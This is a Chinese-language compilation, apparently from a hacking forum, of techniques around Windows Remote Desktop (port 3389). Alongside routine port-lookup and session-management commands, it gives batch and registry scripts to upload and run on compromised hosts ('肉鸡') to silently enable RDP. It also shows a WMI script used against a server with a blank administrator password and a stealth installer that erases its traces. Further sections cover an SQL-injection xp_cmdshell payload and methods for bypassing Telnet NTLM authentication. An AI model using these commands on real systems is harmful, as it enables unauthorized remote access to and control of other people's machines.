查看3389端口总结 一、导出注册表法 regedit /e tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 然后 type tsport.reg | find "PortNumber" 结果如果是d3d的话就证明是3389端口 如果是其他的 转换成10进制就可以了。 二、脚本利用法 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("终端端口为"&TSName) WScript.Echo() WScript.Echo("本程序是帮助你找到终端的端口") WScript.Echo("http://Www.HackPixy.Com&qu... WScript.Echo("Pixy") 把以上代码保存为vbs文件，如“3389port.vbs” 然后在命令行下运行cscript 3389port.vbs 即可查看终端端口（桌面环境下可直接点击查看）。 三、ASP实现法 sub get_terminal_port() terminal_port_path="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" terminal_port_key="PortNumber" termport=wsh.regread(terminal_port_path&terminal_port_key) if termport="" or err.number<>0 then response.write "无法得到终端服务端口。请检查权限是否已经受到限制。
" else response.write "当前终端服务端口: "&termport&"
" end if end sub 四、利用工具 C3389.exe ========================================================= 开启XP And 2003终端的 *** xp、2003开终端的 *** 和2000、nt（ts version）不一样，不是通过安装，因为xp、2003已经自动安装的远程桌面功能，只是启动不启动的问题。 通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能 echo windows registry editor version 5.00>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server]>>3389.reg echo "fdenytsconnections"=dword:00000000>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp]>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp]>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg ========================================================= 修改3389端口 *** （修改后不易被扫出） 修改服务器端的端口设置,注册表有2个地方需要修改 [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp] PortNumber值，默认是3389，修改成所希望的端口，比如6000 第二个地方： [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　 PortNumber值，默认是3389，修改成所希望的端口，比如6000 现在这样就可以了。重启系统就可以了. ============================================================== 打开3389端口的5种 *** 怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用: 1，打开记事本，编辑内容如下： echo [Components] > c:\sql echo TSEnable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 使用 *** ： 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如： c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 服务端口： 设置终端服务的服务端口。默认是3389。 自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。（如果/r不行，可以试试这个） 使用此参数时，端口设置不能忽略。 比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空 运行CMD（2000下的DOS），我们给它开终端！ 命令如下！ cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr 上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启） 脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。 因为pro版不能安装终端服务。 如果你确信脚本判断错误，就继续安装好了。 如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。 脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。 3，下载3389自动安装程序-djshao正式版5.0 说明： 解压djshao5.0.zip,用你的随便什么 *** 把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下，然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！ 特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！ 5，下载DameWare NT Utilities 3.66.0.0 注册版 安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。 复制启动后出现对方桌面。 在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK ============================================================== 终端服务器超出了更大允许连接数的解决办法 1、首先你可以telnet到此主机上(不管你用哪种 *** )，当然如果能直接操作机器更好，不过直接操作就不必用命令行了，用控制台更直观，这里不是我们讲述的问题，略过。 2、Telnet上去后,先看登陆的用户： 输入命令：query user 系统返回： USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console 0 运行中 . 2004-10-09 15:37 user1 UserMachine1 1 运行中 . 2004-10-09 15:37 user2 12 已断开 无 2004-10-09 15:37 此时可以看出的可能根我们的不一样，根据具体情况而定。 看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中，后者已经断开了,但是断开了仍然占用系统资源和通道，我们要把它踢掉。如下进行操作即可。 输入命令：logoff 12 C:\>query user //再看看 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console 0 运行中 . 2004-10-09 15:37 user1 UserMachine1 1 运行中 . 2004-10-09 15:37 3、如果服务器关闭了telnet功能（这是默认的），还可以通过SqlServer的xp_cmdshell扩展存储过程，使用格式：master.dbo.xp_cmdshell '命令内容'，其余可参考第二步。此方式要求有访问xp_cmdshell的权限。 mstsc /console /v:IP:终端端口 T管理 ============================================================== 对于Telnet的HTLM身份验证的突破 *** 总结 By:独孤依人[SST] 对于Telnet的HTLM身份验证的突破 *** 常用以下四种 *** ： 1、新建用户法 telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。 找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新建的帐号和密码，telnet对方ip，直接可以登陆对方电脑了。 这种 *** 我以前常用的，实用性较强 2、命令法 那就是直接运行命令：tlntadmn config sec = -ntlm 注射的话可以直接运行：;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- 运行以后就去掉了该死的ntlm认证：） 3、上传ntml.exe法 这种 *** 有很多缺点，比如：对方有杀毒软件，网段屏蔽了TFTP等等. 4、telnet配置信息写入法 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。 对于Telnet的HTLM身份验证的突破 *** 用1或2中 *** 就可解决！ ==========================================